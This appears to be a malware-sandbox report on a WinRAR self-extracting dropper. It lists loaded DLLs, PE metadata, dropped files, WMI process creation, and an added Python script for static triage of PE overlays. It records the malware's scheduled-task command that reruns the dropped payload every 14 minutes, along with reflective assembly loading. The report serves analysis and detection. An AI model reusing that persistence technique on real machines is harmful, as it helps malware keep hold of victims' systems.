Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: uxtheme.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: windows.storage.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wldp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: profapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: cryptsp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rsaenh.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: cryptbase.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: sspicli.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: amsi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: userenv.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wbemcomn.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: iphlpapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dnsapi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dhcpcsvc6.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: dhcpcsvc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: winnsi.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: propsys.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: edputil.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: urlmon.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: iertutil.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: srvcli.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: netutils.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: policymanager.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: msvcp110_win.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: wintypes.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: appresolver.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: bcp47langs.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: slc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: sppc.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ntmarta.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasapi32.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasman.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rtutils.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: mswsock.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: winhttp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: rasadhlp.dll
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: adKGhCOOzg.exe | Static file information: File size 3099403 > 1048576
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: adKGhCOOzg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: adKGhCOOzg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: adKGhCOOzg.exe | Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Source: adKGhCOOzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: adKGhCOOzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: adKGhCOOzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: adKGhCOOzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: adKGhCOOzg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
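The static rows above (a 3 MB file whose debug record names the WinRAR SFX stub, sfxrar.pdb, and whose DllCharacteristics are DYNAMIC_BASE, NX_COMPAT, GUARD_CF and TERMINAL_SERVER_AWARE) are what an analyst checks first to confirm the sample is a self-extractor carrying its real payload as an appended archive. The Python below is an added example, not code from the Joe Sandbox report or from WinRAR: it decodes DllCharacteristics from the optional header, computes the overlay offset from the section table, and looks in the overlay for an archive signature and anywhere in the file for a PDB path. The PE it parses is constructed inline (a one-section PE32 stub carrying the report's PDB string with a RAR5 signature appended) and only stands in for the real sample; on the real file call `triage(open(path, "rb").read())`.

```python
"""Static triage of a suspected SFX dropper with the standard library only:
decode DllCharacteristics, find the overlay behind the last section, and
look there for an archive signature plus any PDB path in the file."""
import re
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# Archive signatures an SFX stub commonly carries in its overlay
ARCHIVE_MAGICS = [
    (b"Rar!\x1a\x07\x01\x00", "RAR5"),
    (b"Rar!\x1a\x07\x00", "RAR4"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"PK\x03\x04", "ZIP"),
]

# Drive-letter path ending in .pdb, as stored in the CodeView debug record
PDB_PATH_RE = re.compile(rb"[A-Za-z]:\\[\x20-\x7e]{1,240}?\.pdb")


def describe_dll_characteristics(value):
    """Names of the DllCharacteristics bits set in `value`, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def parse_pe(data):
    """Read the header fields needed for triage; ValueError if this is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in PE32 and PE32+
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    sections = []
    table = opt + opt_size
    for i in range(nsections):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size))
    # Bytes past the highest raw section end are overlay: where an SFX keeps its archive
    overlay = max((ptr + size for _, ptr, size in sections), default=0)
    return {"machine": machine, "pe32plus": magic == 0x20B,
            "dll_characteristics": dllchars, "flags": describe_dll_characteristics(dllchars),
            "sections": sections, "overlay_offset": overlay}


def find_overlay_archive(data, overlay_offset):
    """Archive type whose signature starts the overlay, or None."""
    tail = data[overlay_offset:]
    for magic, kind in ARCHIVE_MAGICS:
        if tail.startswith(magic):
            return kind
    return None


def find_pdb_paths(data):
    return sorted({m.group().decode("ascii") for m in PDB_PATH_RE.finditer(data)})


def triage(data):
    info = parse_pe(data)
    info["overlay_archive"] = find_overlay_archive(data, info["overlay_offset"])
    info["pdb_paths"] = find_pdb_paths(data)
    return info


def build_sample_sfx():
    """Constructed stand-in for the sample: one-section PE32 stub with the flags the
    report lists, the report's PDB path in .text, and a RAR5 signature appended."""
    flags = 0x0040 | 0x0100 | 0x4000 | 0x8000  # DYNAMIC_BASE|NX_COMPAT|GUARD_CF|TS_AWARE
    opt = bytearray(224)                        # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 70, flags)      # DllCharacteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)  # i386, 1 section
    section = struct.pack("<8sIIII", b".text", 0x200, 0x1000, 0x200, 0x200) + b"\0" * 16
    hdr = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", hdr, 0x3C, 0x40)     # e_lfanew
    hdr += b"PE\0\0" + coff + bytes(opt) + section
    hdr += b"\0" * (0x200 - len(hdr))           # pad headers up to the first section
    text = b"D:\\Projects\\WinRAR\\sfx\\build\\sfxrar32\\Release\\sfxrar.pdb\0"
    text += b"\xcc" * (0x200 - len(text))
    overlay = b"Rar!\x1a\x07\x01\x00" + b"\0" * 64  # RAR5 signature, archive body elided
    return bytes(hdr) + text + overlay


if __name__ == "__main__":
    report = triage(build_sample_sfx())
    print("DllCharacteristics 0x%04x: %s" % (report["dll_characteristics"], ", ".join(report["flags"])))
    print("overlay at 0x%x, archive: %s" % (report["overlay_offset"], report["overlay_archive"]))
    print("pdb paths:", report["pdb_paths"])
```

Once the overlay archive is located it can be carved at `overlay_offset` and opened with a RAR tool to recover the dropped files without running the stub. The `.didat` section name flagged under Data Obfuscation below is the delay-load import data section that MSVC emits; it is an ordinary feature of the WinRAR SFX stub rather than evidence of a packer, so that row should be weighed accordingly.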

Data Obfuscation

Source: 5.2.SurrogateContainerAgent.exe.1c530000.29.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | File created: C:\portcontainerRef\__tmp_rar_sfx_access_check_7150937
Source: adKGhCOOzg.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_0035E28C push eax; ret 0_2_0035E2AA
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_0035ED46 push ecx; ret 0_2_0035ED59
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 20_2_00007FF887B0FF09 push eax; ret 20_2_00007FF887B10261
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 20_2_00007FF887B10210 push eax; ret 20_2_00007FF887B10261
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 20_2_00007FF887B14526 push E8FFFFFFh; retf 20_2_00007FF887B14531
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BC0220 push eax; ret 28_2_00007FF887BC0261
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA17FA push ebp; ret 28_2_00007FF887BA18DA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA1820 push ebp; ret 28_2_00007FF887BA18DA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA1C81 push edi; ret 28_2_00007FF887BA1C9A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA1BE5 push edi; ret 28_2_00007FF887BA1BFA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA1B75 push esi; ret 28_2_00007FF887BA1B8A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BA1A68 push esi; ret 28_2_00007FF887BA1AAA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887B92D23 push es; ret 31_2_00007FF887B92D42
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887B9B78D push es; ret 31_2_00007FF887B9B78F
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887BAFF09 push eax; ret 31_2_00007FF887BB0261
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887B9AD45 push es; ret 31_2_00007FF887B9AD72
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887BA39F2 push eax; ret 31_2_00007FF887BA3A04
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BCD498 push cs; iretd 36_2_00007FF887BCD61A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BD50D5 pushad ; ret 36_2_00007FF887BD50D6
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BD506E push eax; ret 36_2_00007FF887BD506F
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BCB780 push ss; iretd 36_2_00007FF887BCE85A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BCF789 push ebx; ret 36_2_00007FF887BCF78A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA1C81 push edi; ret 36_2_00007FF887BA1C9A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA17FA push ebp; ret 36_2_00007FF887BA18DA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA1820 push ebp; ret 36_2_00007FF887BA18DA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA1BE5 push edi; ret 36_2_00007FF887BA1BFA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA1B75 push esi; ret 36_2_00007FF887BA1B8A
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BA1A68 push esi; ret 36_2_00007FF887BA1AAA
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BC0220 push eax; ret 36_2_00007FF887BC0261
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BD50D5 pushad ; ret 39_2_00007FF887BD50D6
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BD506E push eax; ret 39_2_00007FF887BD506F

Persistence and Installation Behavior

Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (6 occurrences)
Source: C:\portcontainerRef\SurrogateContainerAgent.exe | File created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | File created: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | File created: C:\portcontainerRef\SurrogateContainerAgent.exe

Boot Survival

Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Process information set: NOOPENFILEERRORBOX (52 occurrences)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process information set: NOOPENFILEERRORBOX (60 occurrences)
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe Process information set: NOOPENFILEERRORBOX
